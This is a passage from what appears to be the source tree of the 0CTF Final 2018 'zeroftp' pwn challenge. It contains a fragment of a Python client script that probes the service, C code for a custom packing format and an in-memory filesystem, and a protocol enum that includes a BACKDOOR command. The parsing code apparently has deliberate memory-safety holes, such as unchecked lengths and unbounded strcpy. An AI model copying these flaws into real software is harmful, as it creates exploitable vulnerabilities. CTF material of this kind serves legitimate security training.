zeroftp_fileinfo('./flag', 0) zeroftp_setfileinfo('test1', 0, 'test2') zeroftp_setfileinfo('test1', 1, 1) zeroftp_mkdir('./zzz') zeroftp_cd('./zzz') zeroftp_wrfile('./123','hackedhackedhacked') zeroftp_wrfile('./456','hackedhackedhacked') zeroftp_wrfile('./abc','hackedhackedhacked') content = zeroftp_rdfile('./456') log.info('file {} content {}'.format('./456', content)) zeroftp_cd('/') directory = zeroftp_ls('/') log.info('directory {}'.format('./flag', directory)) zeroftp_rmdir('/') directory = zeroftp_ls('/') log.info('directory {}'.format(directory)) ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/zero_pack.c ================================================ #include "zero_pack.h" #include "zero_utils.h" #include #include #include //#define DEBUG #ifdef DEBUG2 #define LOG(...) printf(__VA_ARGS__) #else #define LOG(...) #endif /* * bits[0:3] - types * * types: * 1. bool * bits[3] - value 0 or 1 * 2. string * null terminated * 3. raw * bits[3] - short raw (0) or long raw (1) * if short raw * bits[4:8] - length * else if long raw * bits[4:8] - length of length * 4. int * bits[4] - endian * bits[5:8] - length * 5. list * bits[3:8] - length of length */ #define CHECK_MALLOC(ptr, err) { \ do { \ if ((ptr) == (err)) { \ exit(-1); \ } \ } while (0); \ } uint8_t *g_buf; size_t g_buf_len; int zero_unpack_bool(uint8_t *in, uint8_t **out_p, zero_basic_t **p_zero_basic) { uint8_t *payload = in; zero_info_t zero_info; uint8_t zero_basic_types; zero_basic_t *zero_basic = NULL; zero_info = payload[0]; zero_basic_types = BITS(zero_info, 0, 3); if (zero_basic_types != 0x1) { return RET_FAILED; } else { zero_basic = (zero_basic_t *)malloc(sizeof(zero_basic_t)); CHECK_MALLOC(zero_basic, NULL); memset(zero_basic, 0, sizeof(zero_basic_t)); zero_basic->type = 1; zero_basic->len = 1; zero_basic->ptr = malloc(1); *(uint8_t *)(zero_basic->ptr) = BITS(zero_info, 3, 4); *out_p = in+1; *p_zero_basic = zero_basic; LOG("unpack bool %d\n", *(uint8_t *)(zero_basic->ptr)); return RET_SUCCESS; } } int zero_unpack_string(uint8_t *in, uint8_t **out_p, zero_basic_t **p_zero_basic) { uint8_t *payload = in; zero_info_t zero_info; uint8_t zero_basic_types; zero_basic_t *zero_basic = NULL; zero_info = payload[0]; zero_basic_types = BITS(zero_info, 0, 3); if (zero_basic_types != 0x2) { return RET_FAILED; } else { zero_basic = (zero_basic_t *)malloc(sizeof(zero_basic_t)); CHECK_MALLOC(zero_basic, NULL); memset(zero_basic, 0, sizeof(zero_basic_t)); zero_basic->type = 2; zero_basic->len = strlen(payload+1)+1; zero_basic->ptr = malloc(zero_basic->len); CHECK_MALLOC(zero_basic->ptr, NULL); memset((uint8_t *)zero_basic->ptr, 0, zero_basic->len); strcpy(zero_basic->ptr, payload+1); *out_p = in+1+zero_basic->len; *p_zero_basic = zero_basic; LOG("unpack string %s\n", (uint8_t *)(zero_basic->ptr)); return RET_SUCCESS; } } int zero_unpack_raw(uint8_t *in, uint8_t **out_p, zero_basic_t **p_zero_basic) { uint8_t *payload = in; zero_info_t zero_info; uint8_t zero_basic_types; uint8_t zero_raw_type = 0; uint8_t zero_raw_len = 0; size_t zero_raw_long_len = 0; zero_basic_t *zero_basic = NULL; zero_info = payload[0]; zero_basic_types = BITS(zero_info, 0, 3); if (zero_basic_types != 0x3) { return RET_FAILED; } else { zero_raw_type = BITS(zero_info, 3, 4); zero_raw_len = BITS(zero_info, 4, 8); if (!zero_raw_type) { /* short raw */ zero_basic = (zero_basic_t *)malloc(sizeof(zero_basic_t)); CHECK_MALLOC(zero_basic, NULL); memset(zero_basic, 0, sizeof(zero_basic_t)); zero_basic->type = 3; zero_basic->len = zero_raw_len; zero_basic->ptr = malloc(zero_raw_len); CHECK_MALLOC(zero_basic->ptr, NULL); memset((uint8_t *)zero_basic->ptr, 0, zero_raw_len); memcpy(zero_basic->ptr, payload+1, zero_raw_len); *out_p = in+1+zero_basic->len; *p_zero_basic = zero_basic; LOG("unpack short raw %s\n", (uint8_t *)(zero_basic->ptr)); return RET_SUCCESS; } else { /* long raw */ if (zero_raw_len >= 6) { return RET_FAILED; } else { uint64_t tmp = 1; for (int i = 0; i < zero_raw_len; i++, tmp*=0x100) { zero_raw_long_len += payload[1+i]*tmp; } zero_basic = (zero_basic_t *)malloc(sizeof(zero_basic_t)); CHECK_MALLOC(zero_basic, NULL); memset(zero_basic, 0, sizeof(zero_basic_t)); zero_basic->type = 3; zero_basic->len = zero_raw_long_len; zero_basic->ptr = malloc(zero_raw_long_len); CHECK_MALLOC(zero_basic->ptr, NULL); memset((uint8_t *)zero_basic->ptr, 0, zero_raw_long_len); memcpy(zero_basic->ptr, payload+1+zero_raw_len, zero_raw_long_len); *out_p = in+1+zero_basic->len+zero_raw_len; *p_zero_basic = zero_basic; LOG("unpack long raw %s length %lu\n", (uint8_t *)(zero_basic->ptr), zero_raw_long_len); return RET_SUCCESS; } } } } int zero_unpack_int(uint8_t *in, uint8_t **out_p, zero_basic_t **p_zero_basic) { uint8_t *payload = in; zero_info_t zero_info; uint8_t zero_basic_types; uint8_t zero_int_type = 0; uint8_t zero_int_len = 0; uint8_t zero_int_endian = 0; uint64_t zero_int_val = 0; zero_basic_t *zero_basic = NULL; zero_info = payload[0]; zero_basic_types = BITS(zero_info, 0, 3); if (zero_basic_types != 0x4) { return RET_FAILED; } else { zero_int_type = BITS(zero_info, 3, 4); zero_int_len = BITS(zero_info, 5, 8)+1; zero_int_endian = BITS(zero_info, 4, 5); if (!zero_int_endian) { /* little endian */ zero_basic = (zero_basic_t *)malloc(sizeof(zero_basic_t)); CHECK_MALLOC(zero_basic, NULL); memset(zero_basic, 0, sizeof(zero_basic_t)); zero_basic->type = 4; zero_basic->len = zero_int_len; zero_basic->ptr = malloc(9); CHECK_MALLOC(zero_basic->ptr, NULL); uint64_t tmp = 1; for (int i = 0; i < zero_int_len; i++, tmp*=0x100) { zero_int_val += payload[1+i]*tmp; } *((uint64_t *)(((char *)zero_basic->ptr)+1)) = zero_int_val; *((char *)zero_basic->ptr) = zero_int_endian; *out_p = in+1+zero_basic->len; *p_zero_basic = zero_basic; LOG("unpack int little endian %lx\n", *((uint64_t *)(((char *)zero_basic->ptr)+1))); return RET_SUCCESS; } else { /* big endian */ zero_basic = (zero_basic_t *)malloc(sizeof(zero_basic_t)); CHECK_MALLOC(zero_basic, NULL); memset(zero_basic, 0, sizeof(zero_basic_t)); zero_basic->type = 4; zero_basic->len = zero_int_len; zero_basic->ptr = malloc(9); CHECK_MALLOC(zero_basic->ptr, NULL); uint64_t tmp = 1; for (int i = 0; i < zero_int_len; i++, tmp*=0x100) { zero_int_val += payload[1+zero_int_len-i-1]*tmp; } *((uint64_t *)(((char *)zero_basic->ptr)+1)) = zero_int_val; *((char *)zero_basic->ptr) = zero_int_endian; *out_p = in+1+zero_basic->len; *p_zero_basic = zero_basic; LOG("unpack int big endian %lx\n", *((uint64_t *)(((char *)zero_basic->ptr)+1))); return RET_SUCCESS; } } } //int zero_unpack_list(uint8_t *in, uint8_t **out_p, zero_basic_t **p_zero_basic) { // uint8_t *payload = in; // uint8_t *payload_in, *payload_out; // zero_info_t zero_info; // uint8_t zero_basic_types; // uint8_t zero_list_type = 0; // uint8_t zero_list_len = 0; // size_t zero_list_long_len = 0; // zero_basic_t *zero_basic = NULL; // zero_basic_t *zero_basic_tmp = NULL; // // zero_info = payload[0]; // // zero_basic_types = BITS(zero_info, 0, 3); // // if (zero_basic_types != 0x5) { // return RET_FAILED; // } else { // zero_list_type = BITS(zero_info, 3, 4); // zero_list_len = BITS(zero_info, 4, 8); // // if (!zero_list_type) { // /* short list */ // zero_basic = (zero_basic_t *)malloc(sizeof(zero_basic_t)); // CHECK_MALLOC(zero_basic, NULL); // memset(zero_basic, 0, sizeof(zero_basic_t)); // zero_basic->type = 5; // zero_basic->len = zero_list_len; // zero_basic->ptr = malloc(sizeof(zero_basic_t *)*zero_list_len); // CHECK_MALLOC(zero_basic->ptr, NULL); // memset(zero_basic->ptr, 0, sizeof(zero_basic_t *)*zero_list_len); // // payload_in = payload+1; // for (int i = 0; i < zero_list_len; i++) { // zero_unpack(payload_in, &payload_out, &zero_basic_tmp); // ((zero_basic_t **)zero_basic->ptr)[i] = zero_basic_tmp; // payload_in = payload_out; // } // // *out_p = payload_out; // *p_zero_basic = zero_basic; // // LOG("unpack short list %d\n", zero_list_len); // // return RET_SUCCESS; // } else { // /* long list */ // if (zero_list_len >= 6) { // return RET_FAILED; // } else { // uint64_t tmp = 1; // for (int i = 0; i < zero_list_len; i++, tmp*=0x100) { // zero_list_long_len += payload[1+i]*tmp; // } // // zero_basic = (zero_basic_t *)malloc(sizeof(zero_basic_t)); // CHECK_MALLOC(zero_basic, NULL); // memset(zero_basic, 0, sizeof(zero_basic_t)); // zero_basic->type = 5; // zero_basic->len = zero_list_long_len; // zero_basic->ptr = malloc(sizeof(zero_basic_t *)*zero_list_long_len); // CHECK_MALLOC(zero_basic->ptr, NULL); // memset(zero_basic->ptr, 0, sizeof(zero_basic_t *)*zero_list_long_len); // // payload_in = payload+1+zero_list_len; // for (int i = 0; i < zero_list_long_len; i++) { // zero_unpack(payload_in, &payload_out, &zero_basic_tmp); // ((zero_basic_t **)zero_basic->ptr)[i] = zero_basic_tmp; // payload_in = payload_out; // } // // *out_p = payload_out; // *p_zero_basic = zero_basic; // // LOG("unpack long list %d\n", zero_list_long_len); // // return RET_SUCCESS; // } // } // } //} static inline int zero_pack_bool(zero_basic_t *zero_basic, uint8_t *in, uint8_t **out_p) { uint8_t *payload = in; size_t payload_len = 0; uint8_t info = 0x0; uint8_t val = *(uint8_t *)zero_basic->ptr; payload_len += 1; info = BITS_SET_VAL(info, 0, 3, 1); // types info = BITS_SET_VAL(info, 3, 4, val); // bool *payload = info; *out_p = payload+payload_len; } __attribute__((always_inline)) static inline int zero_pack_string(zero_basic_t *zero_basic, uint8_t *in, uint8_t **out_p) { uint8_t *payload = in; uint8_t info = 0x0; uint8_t *str = (uint8_t *)zero_basic->ptr; size_t str_len = 0; info = BITS_SET_VAL(info, 0, 3, 2); // types *payload = info; payload += 1; str_len = strlen(str); strcpy(payload, str); payload += str_len+1; *out_p = payload; } __attribute__((always_inline)) static inline int zero_pack_raw(zero_basic_t *zero_basic, uint8_t *in, uint8_t **out_p) { uint8_t *payload = in; uint8_t info = 0x0; uint8_t *raw = (uint8_t *)zero_basic->ptr; size_t raw_len = zero_basic->len; size_t raw_len_len = 0; if (raw_len <= 15) { info = BITS_SET_VAL(info, 0, 3, 3); // types info = BITS_SET_VAL(info, 3, 4, 0); // short or long info = BITS_SET_VAL(info, 4, 8, raw_len); // len *payload = info; payload += 1; memcpy(payload, raw, raw_len); payload += raw_len; *out_p = payload; } else { info = BITS_SET_VAL(info, 0, 3, 3); // types info = BITS_SET_VAL(info, 3, 4, 1); // short or long payload += 1; for (int i = raw_len; i; i/=0x100) { *payload = i%0x100; payload += 1; raw_len_len += 1; } info = BITS_SET_VAL(info, 4, 8, raw_len_len); // len of len *(payload-raw_len_len-1) = info; memcpy(payload, raw, raw_len); payload += raw_len; *out_p = payload; } } __attribute__((always_inline)) static inline int zero_pack_int(zero_basic_t *zero_basic, uint8_t *in, uint8_t **out_p) { uint8_t *payload = in; uint8_t info = 0x0; uint64_t int_val = *(uint64_t *)(((char *)zero_basic->ptr)+1); uint8_t int_endian = *((char *)zero_basic->ptr); uint8_t int_len = zero_basic->len; info = BITS_SET_VAL(info, 0, 3, 4); // types info = BITS_SET_VAL(info, 4, 5, int_endian); // endian info = BITS_SET_VAL(info, 5, 8, int_len-1); *payload = info; payload += 1; if (!int_endian) { /* little endian */ uint64_t tmp = 1; for (int i = 0; i < int_len; i++, tmp*=0x100) { *(payload+i) = int_val/tmp; } } else { /* big endian */ uint64_t tmp = 1; for (int i = 0; i < int_len; i++, tmp*=0x100) { *(payload+int_len-1-i) = int_val/tmp; } } payload += int_len; *out_p = payload; } __attribute__((always_inline)) static inline int zero_pack_list(zero_basic_t *zero_basic, uint8_t *in, uint8_t **out_p) { uint8_t *payload = in; uint8_t *payload_in = in+1; uint8_t *payload_out = in; uint8_t info = 0x0; uint8_t *list = (uint8_t *)zero_basic->ptr; size_t list_len = zero_basic->len; size_t list_len_len = 0; if (list_len <= 15) { info = BITS_SET_VAL(info, 0, 3, 5); // types info = BITS_SET_VAL(info, 3, 4, 0); // short or long info = BITS_SET_VAL(info, 4, 8, list_len); // len *payload = info; payload += 1; payload_out = payload; for (int i = 0; i < list_len; i++) { zero_pack(((zero_basic_t **)zero_basic->ptr)[i], payload_in, &payload_out); payload_in = payload_out; } *out_p = payload_out; } else { info = BITS_SET_VAL(info, 0, 3, 5); // types info = BITS_SET_VAL(info, 3, 4, 1); // short or long payload += 1; for (int i = list_len; i; i/=0x100) { *payload = i%0x100; payload += 1; list_len_len += 1; } info = BITS_SET_VAL(info, 4, 8, list_len_len); // len of len *(payload-list_len_len-1) = info; payload_in = payload; payload_out = payload; for (int i = 0; i < list_len; i++) { zero_pack(((zero_basic_t **)zero_basic->ptr)[i], payload_in, &payload_out); payload_in = payload_out; } *out_p = payload_out; } } __attribute__((always_inline)) //int zero_unpack(uint8_t *in, uint8_t **out_p, zero_basic_t **p_zero_basic) { // zero_info_t zero_info; // uint8_t zero_basic_types; // int result; // zero_info = in[0]; // zero_basic_types = BITS(zero_info, 0, 3); // // switch(zero_basic_types) { // case 1: // result = zero_unpack_bool(in, out_p, p_zero_basic); // return result; // case 2: // result = zero_unpack_string(in, out_p, p_zero_basic); // return result; // break; // case 3: // result = zero_unpack_raw(in, out_p, p_zero_basic); // return result; // break; // case 4: // result = zero_unpack_int(in, out_p, p_zero_basic); // return result; // break; // case 5: // result = zero_unpack_list(in, out_p, p_zero_basic); // return result; // break; // default: // return RET_FAILED; // break; // } //} size_t zero_pack_bool_len(zero_basic_t *zero_basic) { return 1; } size_t zero_pack_string_len(zero_basic_t *zero_basic) { return zero_basic->len+2; } size_t zero_pack_raw_len(zero_basic_t *zero_basic) { size_t raw_len = zero_basic->len; if (raw_len <= 15) { return raw_len+1; } else { size_t raw_len_len = 0; for (int i = raw_len; i; i/=0x100) { raw_len_len += 1; } return raw_len_len+raw_len+1; } } size_t zero_pack_int_len(zero_basic_t *zero_basic) { return zero_basic->len+1; } size_t zero_pack_list_len(zero_basic_t *zero_basic) { size_t len = 0; for (int i = 0; i < zero_basic->len; i++) { len += zero_pack_len(((zero_basic_t **)zero_basic->ptr)[i]); } return len+1; } size_t zero_pack_len(zero_basic_t *zero_basic) { uint8_t zero_basic_types; int result; zero_basic_types = zero_basic->type; switch(zero_basic_types) { case 1: result = zero_pack_bool_len(zero_basic); return result; case 2: result = zero_pack_string_len(zero_basic); return result; case 3: result = zero_pack_raw_len(zero_basic); return result; case 4: result = zero_pack_int_len(zero_basic); return result; case 5: result = zero_pack_list_len(zero_basic); return result; default: return RET_FAILED; break; } } int zero_pack(zero_basic_t *zero_basic, uint8_t *in, uint8_t **out_p) { uint8_t zero_basic_types; int result; zero_basic_types = zero_basic->type; switch(zero_basic_types) { case 1: result = zero_pack_bool(zero_basic, in, out_p); return result; case 2: result = zero_pack_string(zero_basic, in, out_p); return result; case 3: result = zero_pack_raw(zero_basic, in, out_p); return result; case 4: result = zero_pack_int(zero_basic, in, out_p); return result; case 5: result = zero_pack_list(zero_basic, in, out_p); return result; default: return RET_FAILED; break; } } void zero_basic_bool_free(zero_basic_t *zero_basic) { free(zero_basic->ptr); free(zero_basic); } void zero_basic_string_free(zero_basic_t *zero_basic) { free(zero_basic->ptr); free(zero_basic); } void zero_basic_raw_free(zero_basic_t *zero_basic) { free(zero_basic->ptr); free(zero_basic); } void zero_basic_int_free(zero_basic_t *zero_basic) { free(zero_basic->ptr); free(zero_basic); } void zero_basic_list_free(zero_basic_t *zero_basic) { size_t len = 0; for (int i = 0; i < zero_basic->len; i++) { zero_basic_free(((zero_basic_t **)zero_basic->ptr)[i]); } free(zero_basic->ptr); free(zero_basic); } void zero_basic_free(zero_basic_t *zero_basic) { uint8_t zero_basic_types; int result; zero_basic_types = zero_basic->type; switch(zero_basic_types) { case 1: zero_basic_bool_free(zero_basic); break; case 2: zero_basic_string_free(zero_basic); break; case 3: zero_basic_raw_free(zero_basic); break; case 4: zero_basic_int_free(zero_basic); break; case 5: zero_basic_list_free(zero_basic); break; default: break; } } void zero_bool_new(zero_basic_t **zero_basic_p, uint8_t val) { zero_basic_t *zero_basic = (zero_basic_t *)malloc(sizeof(zero_basic_t)); CHECK_MALLOC(zero_basic, NULL); memset(zero_basic, 0, sizeof(zero_basic_t)); zero_basic->type = 1; zero_basic->len = 1; zero_basic->ptr = malloc(1); CHECK_MALLOC(zero_basic->ptr, NULL); *(uint8_t *)(zero_basic->ptr) = val; *zero_basic_p = zero_basic; } void zero_string_new(zero_basic_t **zero_basic_p, char *str) { zero_basic_t *zero_basic = (zero_basic_t *)malloc(sizeof(zero_basic_t)); CHECK_MALLOC(zero_basic, NULL); memset(zero_basic, 0, sizeof(zero_basic_t)); zero_basic->type = 2; zero_basic->len = strlen(str)+1; zero_basic->ptr = malloc(zero_basic->len); CHECK_MALLOC(zero_basic->ptr, NULL); strcpy(zero_basic->ptr, str); *zero_basic_p = zero_basic; } void zero_raw_new(zero_basic_t **zero_basic_p, uint8_t *raw, size_t len) { zero_basic_t *zero_basic = (zero_basic_t *)malloc(sizeof(zero_basic_t)); CHECK_MALLOC(zero_basic, NULL); memset(zero_basic, 0, sizeof(zero_basic_t)); zero_basic->type = 3; zero_basic->len = len; zero_basic->ptr = malloc(len); CHECK_MALLOC(zero_basic->ptr, NULL); memcpy(zero_basic->ptr, raw, len); *zero_basic_p = zero_basic; } void zero_int_new(zero_basic_t **zero_basic_p, uint64_t val, uint8_t endian) { uint8_t len = 0; uint64_t val_tmp = val; if (val == 0) { len = 1; } else { for (int i = val_tmp; val_tmp; val_tmp/=0x100) { len++; } } zero_basic_t *zero_basic = (zero_basic_t *)malloc(sizeof(zero_basic_t)); CHECK_MALLOC(zero_basic, NULL); memset(zero_basic, 0, sizeof(zero_basic_t)); zero_basic->type = 4; zero_basic->len = len; zero_basic->ptr = malloc(9); CHECK_MALLOC(zero_basic->ptr, NULL); memset(zero_basic->ptr, '\0', 9); *((char *)zero_basic->ptr) = endian; *((uint64_t *)(((char *)zero_basic->ptr)+1)) = val; *zero_basic_p = zero_basic; } void zero_list_new(zero_basic_t **zero_basic_p, zero_basic_t **list) { zero_basic_t *tmp; size_t len = 0; PTRARRAY_LEN(list, len); //while (list[len]) { // len++; //} //printf("%ld\n", len); zero_basic_t *zero_basic = (zero_basic_t *)malloc(sizeof(zero_basic_t)); CHECK_MALLOC(zero_basic, NULL); memset(zero_basic, 0, sizeof(zero_basic_t)); zero_basic->type = 5; zero_basic->len = len; zero_basic->ptr = malloc(len*8); CHECK_MALLOC(zero_basic->ptr, NULL); memcpy(zero_basic->ptr, list, len*8); *zero_basic_p = zero_basic; } #ifdef DEBUG static void zero_bool_test() { zero_basic_t *tmp; zero_basic_t *zero_basic; zero_bool_new(&zero_basic, 1); uint8_t *in = malloc(0x300); uint8_t *out; zero_pack(zero_basic, in, &out); LOG("%lx\n", out-in); zero_unpack(in, &out, &tmp); //zero_unpack_bool(in, &out, &tmp); LOG("%lx\n\n", out-in); } static void zero_string_test() { zero_basic_t *tmp; zero_basic_t *zero_basic; zero_string_new(&zero_basic, "ABCDABCDABCDABCD"); uint8_t *in = malloc(0x300); uint8_t *out; zero_pack(zero_basic, in, &out); LOG("%lx\n", out-in); zero_unpack(in, &out, &tmp); //zero_unpack_string(in, &out, &tmp); LOG("%lx\n\n", out-in); } static void zero_short_raw_test() { zero_basic_t *tmp; zero_basic_t *zero_basic; zero_raw_new(&zero_basic, "rrrrrrrrrrrrrrr", 0xf); uint8_t *in = malloc(0x300); uint8_t *out; zero_pack(zero_basic, in, &out); LOG("%lx\n", out-in); zero_unpack(in, &out, &tmp); //zero_unpack_raw(in, &out, &tmp); LOG("%lx\n\n", out-in); } static void zero_long_raw_test() { zero_basic_t *tmp; zero_basic_t *zero_basic; uint8_t buf[0x100]; memset(buf, 'a', 0x100); zero_raw_new(&zero_basic, buf, 0x100); uint8_t *in = malloc(0x300); uint8_t *out; zero_pack(zero_basic, in, &out); LOG("%lx\n", out-in); zero_unpack(in, &out, &tmp); //zero_unpack_raw(in, &out, &tmp); LOG("%lx\n\n", out-in); } static void zero_int_little_test() { zero_basic_t *tmp; zero_basic_t *zero_basic; zero_int_new(&zero_basic, 0x4142434445464748, 0x0); uint8_t *in = malloc(0x300); uint8_t *out; zero_pack(zero_basic, in, &out); LOG("%lx\n", out-in); zero_unpack(in, &out, &tmp); //zero_unpack_int(in, &out, &tmp); LOG("%lx\n\n", out-in); } static void zero_int_big_test() { zero_basic_t *tmp; zero_basic_t *zero_basic; zero_int_new(&zero_basic, 0x4142434445464748, 0x1); uint8_t *in = malloc(0x300); uint8_t *out; zero_pack(zero_basic, in, &out); LOG("%lx\n", out-in); zero_unpack(in, &out, &tmp); //zero_unpack_int(in, &out, &tmp); LOG("%lx\n\n", out-in); } static void zero_list_test() { zero_basic_t *tmp = 0; zero_basic_t *zero_basic1; zero_raw_new(&zero_basic1, "rrrrrrrrrrrrrrr", 0xf); zero_basic_t *zero_basic2; zero_int_new(&zero_basic2, 0x4142434445464748, 0x1); zero_basic_t *zero_basic; zero_basic_t *zero_basic_list[3]; zero_basic_list[0] = zero_basic1; zero_basic_list[1] = zero_basic2; zero_basic_list[2] = NULL; zero_list_new(&zero_basic, zero_basic_list); zero_basic_t *zero_basic3; zero_raw_new(&zero_basic3, "AAAAAAAAAAAAAAA", 0xf); zero_basic_t *zero_basic4; zero_int_new(&zero_basic4, 0x4242434445464748, 0x1); zero_basic_t *zero_basic5; zero_basic_t *zero_basic_list2[4]; zero_basic_list2[0] = zero_basic3; zero_basic_list2[1] = zero_basic4; zero_basic_list2[2] = zero_basic; zero_basic_list2[3] = NULL; zero_list_new(&zero_basic5, zero_basic_list2); uint8_t *in = malloc(0x100); uint8_t *out; zero_pack(zero_basic5, in, &out); LOG("%lx\n", out-in); zero_unpack(in, &out, &tmp); LOG("%lx\n\n", out-in); } void test_zero_pack() { //g_buf_len = 0x1000; //g_buf = malloc(g_buf_len); zero_bool_test(); zero_string_test(); zero_short_raw_test(); zero_long_raw_test(); zero_int_little_test(); zero_int_big_test(); zero_list_test(); } void zero_basic_dump(zero_basic_t *target, size_t size) { printf("type : %d\n", target->type); printf("len : %d\n", target->len); zero_hexdump(target->ptr, size); } #endif ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/zero_pack.h ================================================ #ifndef ZERO_PACK_H #define ZERO_PACK_H #include #include enum zero_basic_type { ZERO_BOOL = 1, ZERO_STRING = 2, ZERO_RAW = 3, ZERO_INT = 4, ZERO_LIST = 5 }; typedef uint8_t zero_info_t ; typedef uint8_t zero_types_t ; typedef struct zero_basic_t { uint8_t type; size_t len; void *ptr; } zero_basic_t; typedef int32_t result_t; enum RETURN_RESULT { RET_SUCCESS = 0, RET_FAILED = -1, } card; #define ZERO_BASIC_TYPE(zero_basic) zero_basic->type #define ZERO_BOOL_VAL(zero_basic) *((uint8_t *)zero_basic->ptr) #define ZERO_INT_VAL(zero_basic) *((uint64_t *)(((char *)zero_basic->ptr)+1)) //#define ZERO_INT_VAL(zero_basic) *((uint64_t *)(((char *)zero_basic->ptr)+1)) #define ZERO_STRING_VAL(zero_basic) (char *)(zero_basic->ptr) /* * functions */ int zero_unpack_bool(uint8_t *in, uint8_t **out_p, zero_basic_t **zero_basic); int zero_unpack_string(uint8_t *in, uint8_t **out_p, zero_basic_t **zero_basic); int zero_unpack_raw(uint8_t *in, uint8_t **out_p, zero_basic_t **zero_basic); int zero_unpack_int(uint8_t *in, uint8_t **out_p, zero_basic_t **zero_basic); //int zero_unpack_list(uint8_t *in, uint8_t **out_p, zero_basic_t **zero_basic); //int zero_unpack(uint8_t *in, uint8_t **out_p, zero_basic_t **zero_basic); int zero_pack(zero_basic_t *zero_basic, uint8_t *in, uint8_t **out_p); void zero_bool_new(zero_basic_t **zero_basic_p, uint8_t val); void zero_string_new(zero_basic_t **zero_basic_p, char *val); void zero_raw_new(zero_basic_t **zero_basic_p, uint8_t *raw, size_t len); void zero_int_new(zero_basic_t **zero_basic_p, uint64_t val, uint8_t endian); void zero_list_new(zero_basic_t **zero_basic_p, zero_basic_t **list); size_t zero_pack_len(zero_basic_t *zero_basic); void zero_basic_free(zero_basic_t *zero_basic); #ifdef DEBUG void test_zero_pack(); void zero_basic_dump(zero_basic_t *, size_t); #endif #endif ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/zero_proto.h ================================================ #ifndef ZERO_PROTO_H #define ZERO_PROTO_H #define ZERO_MAGIC 0xdd #define ZERO_MAGIC_LEN 1 enum zeroftp_cmd_type { ZEROFTP_LOGIN = 1, ZEROFTP_LS, ZEROFTP_CD, ZEROFTP_MKDIR, ZEROFTP_RMDIR, ZEROFTP_RDFILE, ZEROFTP_WRFILE, ZEROFTP_RMFILE, ZEROFTP_FILEINFO, ZEROFTP_SETFILEINFO, ZEROFTP_BACKDOOR, ZEROFTP_QUIT, }; #endif ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/zero_utils.c ================================================ #include #include void zero_hexdump(unsigned char *mem, int len) { int i = 0; int j = 0; int maxlines = len/0x10+1; int tmp; for (; i < maxlines; i+=0x1) { if (i == maxlines-1) { tmp = len%0x10; } else { tmp = 0x10; } for (; j < tmp; j+=0x1) { if (j == 7) { //printf("%02x ", *(mem+j+i*0x10)); printf("%02x ", *(mem+j+i*0x10)); } else { printf("%02x ", *(mem+j+i*0x10)); } } puts(""); j = 0x0; } write(1, mem, len); puts("\n"); } ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/zero_utils.h ================================================ #ifndef ZERO_UTILS_H #define ZERO_UTILS_H #include #include #define BITS(byte, start, end) ((byte>>start)&((1<<(end-start))-1)) #define BITS_SET(byte, pos) (byte|(1<b?a:b void zero_hexdump(unsigned char *mem, int len); //#ifdef DEBUG //#define LOG(...) printf(__VA_ARGS__) //#else //#define LOG(...) //#endif #endif ================================================ FILE: 2018/0ctf-final-2018/pwn/zeroftp/zerofs.c ================================================ /************************************************************************* > File Name: zerofs.c > Author: > Mail: > Created Time: Thu May 3 17:27:52 2018 ************************************************************************/ #include #include #include #include #include #include #include #include "zerofs.h" /* * MACRO */ #ifdef DEBUG #define LOG(format, args...) { \ do { \ dprintf(2, format"\n", ##args); \ } while (0); \ } #define DEBUG_CHECK(code) { \ do { \ code \ } while(0); \ } #else #define LOG(format, args...) {} #define DEBUG_CHECK(code) {} #endif #define INSERT_FNODE(fnode, dnode) { \ do { \ ((fnode)->brother) = ((dnode)->info.child); \ ((fnode)->parent) = (dnode); \ ((dnode)->info.child) = fnode; \ } while (0); \ } #define CHECK_MALLOC(ptr, err) { \ do { \ if ((ptr) == (err)) { \ exit(-1); \ } \ } while (0); \ } zerofs_state *state; /* * Static Functions */ static int _create_block(void) { long int i, j; long int one = 1; for (i = 0; i < (BLOCKS_NUM / 0x40); i++) { if (state->disk->bitmap[i] == (long int) -1) { continue; } for (j = 0; j < 0x40; j++) { if (!((one << j) & state->disk->bitmap[i])) { LOG("[_create_block] find empty block"); state->disk->bitmap[i] |= (one << j); return (i * 0x40 + j); } } } LOG("[_create_block] no enough block"); exit(-1); } static int _free_block(int blockId) { long int i = blockId / 0x40; long int j = blockId % 0x40; long int one = 1; if (!(state->disk->bitmap[i] & (one << j))) { LOG("[_free_block] blockId (%d) not inuse", blockId); return -1; } state->disk->bitmap[i] ^= (one << j); state->disk->blocks[blockId].nextId = -1; LOG("[_free_block] blockId (%d) freed", blockId); return 0; } static long int _memory_truncate(long int blockId, off_t length, long int size) { long int blockId_; long int size_; if (!length) { if (blockId == -1) { return -1; } blockId_ = state->disk->blocks[blockId].nextId; _free_block(blockId); return _memory_truncate(blockId_, length, size - BLOCK_SIZE); } if (blockId == -1) { blockId = _create_block(); } if (length <= BLOCK_SIZE) { if (length <= size) { blockId_ = state->disk->blocks[blockId].nextId; state->disk->blocks[blockId].nextId = _memory_truncate(blockId_, 0, size - BLOCK_SIZE); return blockId; } else { memset(&(state->disk->blocks[blockId].data[size]), 0, length - size); return blockId; } } else { if (size < 0) { size_ = 0; } else { size_ = size; } if (size < BLOCK_SIZE) { memset(&(state->disk->blocks[blockId].data[size_]), 0, BLOCK_SIZE - size_); } blockId_ = state->disk->blocks[blockId].nextId; state->disk->blocks[blockId].nextId = _memory_truncate(blockId_, length - BLOCK_SIZE, size - BLOCK_SIZE); return blockId; } } static ssize_t _memory_write(long int blockId, const void *buf, long int st, long int en) { long int blockId_ = state->disk->blocks[blockId].nextId; if (st >= BLOCK_SIZE) { if (blockId_ == -1) { blockId_ = state->disk->blocks[blockId].nextId = _create_block(); } return _memory_write(blockId_, buf, st - BLOCK_SIZE, en - BLOCK_SIZE); } if (en > BLOCK_SIZE) { memcpy(&(state->disk->blocks[blockId].data[st]), buf, BLOCK_SIZE - st); buf = (char *)buf + BLOCK_SIZE - st; if (blockId_ == -1) { blockId_ = state->disk->blocks[blockId].nextId = _create_block(); } return _memory_write(blockId_, buf, 0, en - BLOCK_SIZE) + BLOCK_SIZE - st; } memcpy(&(state->disk->blocks[blockId].data[st]), buf, en - st); return en - st; } static ssize_t _memory_read(long int blockId, void *buf, long int st, long int en) { if (blockId == -1) { LOG("[_memory_read] invalid blockId (%ld)", blockId); return -1; } long int blockId_ = state->disk->blocks[blockId].nextId; if (st >= BLOCK_SIZE) { return _memory_read(blockId_, buf, st - 